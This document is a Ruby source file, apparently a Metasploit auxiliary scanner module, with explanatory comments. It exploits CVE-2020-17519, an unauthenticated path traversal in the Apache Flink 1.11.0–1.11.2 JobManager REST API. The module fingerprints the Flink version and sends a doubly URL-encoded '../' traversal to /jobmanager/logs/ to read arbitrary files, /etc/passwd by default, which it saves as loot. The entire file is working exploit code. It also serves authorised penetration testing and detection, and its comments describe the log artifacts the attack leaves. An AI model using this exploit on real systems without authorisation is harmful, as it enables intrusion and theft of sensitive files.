Path: blob/master/modules/auxiliary/scanner/http/apache_flink_jobmanager_traversal.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Scanner module for CVE-2020-17519: an unauthenticated path traversal in the
# Apache Flink JobManager REST API (1.11.0 <= version <= 1.11.2) that lets a
# client read arbitrary files readable by the JobManager process via the
# /jobmanager/logs/ endpoint.
#
# Flow per host (see Msf::Auxiliary::Scanner): check_host fingerprints the
# target through GET <target_uri>/config, run_host fetches FILEPATH through
# retrieve_file and stores the result as loot.
#
# Defensive notes grounded in what this module does:
#  - Every request is a plain HTTP GET; the traversal request carries a
#    doubly URL-encoded '../' sequence in the path, which is why the module
#    declares IOC_IN_LOGS below. Access-log entries for /jobmanager/logs/
#    containing encoded traversal sequences are the expected artifact.
#  - The version check treats anything outside 1.11.0-1.11.2 as not
#    vulnerable; a target that hides or omits 'flink-version' is only
#    reported as Detected, not as Appears.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Registers module metadata and the two user options:
  #   DEPTH    - number of '../' segments prepended to FILEPATH (default 10)
  #   FILEPATH - absolute path of the file to read (default /etc/passwd)
  # RPORT defaults to 8081, the JobManager web UI/REST port used by the
  # check and the traversal request.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Flink JobManager Traversal',
        'Description' => %q{
          This module exploits an unauthenticated directory traversal vulnerability
          in Apache Flink versions 1.11.0 <= 1.11.2. The JobManager REST API fails
          to validate user-supplied log file paths, allowing retrieval of arbitrary
          files with the privileges of the web server user.

          This module has been tested successfully on Apache Flink version 1.11.2
          on Ubuntu 18.04.4.
        },
        'Author' => [
          '0rich1 - Ant Security FG Lab', # Vulnerability discovery
          'Hoa Nguyen - Suncsr Team', # Metasploit module
          'bcoles', # Metasploit module cleanup and improvements
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2020-17519'],
          ['CWE', '22'],
          ['EDB', '49398'],
          ['PACKETSTORM', '160849'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2021/01/05/2'],
          ['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
        ],
        'DefaultOptions' => { 'RPORT' => 8081 },
        'DisclosureDate' => '2021-01-05',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # Reliability is intentionally left empty: the module reads a file
          # and does not obtain a session, so no reliability class applies.
          'Reliability' => [],
          # The traversal request is recorded by the web server / JobManager
          # access logging; see the class comment for the expected artifact.
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptInt.new('DEPTH', [ true, 'Depth for path traversal', 10]),
      OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd'])
    ])
  end

  # Fingerprints the target with GET <target_uri>/config and classifies it
  # from the 'flink-version' field of the JSON reply.
  #
  # @param _ip [String] host being scanned (unused; the connection details
  #   come from the datastore via send_request_cgi)
  # @return [Exploit::CheckCode]
  #   Unknown  - no HTTP response at all
  #   Safe     - body does not contain the substring 'flink'
  #   Detected - 'flink' present but no usable 'flink-version' value
  #   Appears  - version parses into the range 1.11.0..1.11.2 inclusive
  #   Safe     - any other version string
  def check_host(_ip)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'config')
    })

    unless res
      return Exploit::CheckCode::Unknown('No reply.')
    end

    # Loose fingerprint: any body mentioning 'flink' passes this gate; the
    # version field below is what actually decides the verdict.
    unless res.body.include?('flink')
      return Exploit::CheckCode::Safe('Target is not Apache Flink.')
    end

    version = res.get_json_document['flink-version']

    if version.blank?
      return Exploit::CheckCode::Detected('Could not determine Apache Flink software version.')
    end

    # Inclusive range check against the affected releases named in the
    # module description. Rex::Version#between? relies on the version string
    # being parseable; a malformed value would raise rather than be hidden.
    if Rex::Version.new(version).between?(Rex::Version.new('1.11.0'), Rex::Version.new('1.11.2'))
      return Exploit::CheckCode::Appears("Apache Flink version #{version} appears vulnerable.")
    end

    Exploit::CheckCode::Safe("Apache Flink version #{version} is not vulnerable.")
  end

  # Requests <target_uri>/jobmanager/logs/<traversal> and returns the body.
  #
  # The traversal string is '../' repeated `depth` times followed by
  # `filepath`, URL-encoded twice: first with 'hex-all' (every byte), then
  # with the default encoder. The double encoding is the core of the
  # CVE-2020-17519 technique and is also what makes the request recognisable
  # in access logs (the declared IOC_IN_LOGS side effect).
  #
  # @param depth [Integer] number of '../' segments
  # @param filepath [String] path of the file to read on the target
  # @return [String, nil] response body on HTTP 200; nil after printing an
  #   error for no reply, 404, 500 or any other non-200 status
  def retrieve_file(depth, filepath)
    traversal = Rex::Text.uri_encode(Rex::Text.uri_encode("#{'../' * depth}#{filepath}", 'hex-all'))
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'jobmanager', 'logs', traversal)
    })

    unless res
      print_error('No reply')
      return
    end

    if res.code == 404
      print_error('File not found')
      return
    end

    if res.code == 500
      print_error("Unexpected reply (HTTP #{res.code}): Server encountered an error attempting to read file")
      # The regex's `\\n` matches a literal backslash followed by 'n', i.e. an
      # escaped newline inside the body rather than a real line break —
      # presumably because the error body is a JSON string; confirm against a
      # live 500 response. Only the last "Caused by:" fragment is shown.
      msg = res.body.scan(/Caused by: (.+?)\\n/).flatten.last
      print_error(msg) if msg
      return
    end

    if res.code != 200
      print_error("Unexpected reply (HTTP #{res.code})")
      return
    end

    res.body.to_s
  end

  # Per-host scanner entry point: reads DEPTH and FILEPATH from the
  # datastore, fetches the file through retrieve_file and stores non-blank
  # content as loot under 'apache.flink.jobmanager.traversal'.
  #
  # @param ip [String] host being scanned; recorded with the loot entry
  # @return [void]
  def run_host(ip)
    depth = datastore['DEPTH']
    filepath = datastore['FILEPATH']

    print_status("Downloading #{filepath} ...")
    res = retrieve_file(depth, filepath)

    # retrieve_file has already printed an error for the nil case. Note that
    # an existing but empty file is also blank and is skipped here without
    # any message.
    return if res.blank?

    print_good("Downloaded #{filepath} (#{res.length} bytes)")
    # Loot file name is derived from the basename of the requested path.
    path = store_loot(
      'apache.flink.jobmanager.traversal',
      'text/plain',
      ip,
      res,
      File.basename(filepath)
    )
    print_good("File #{filepath} saved in: #{path}")
  end
end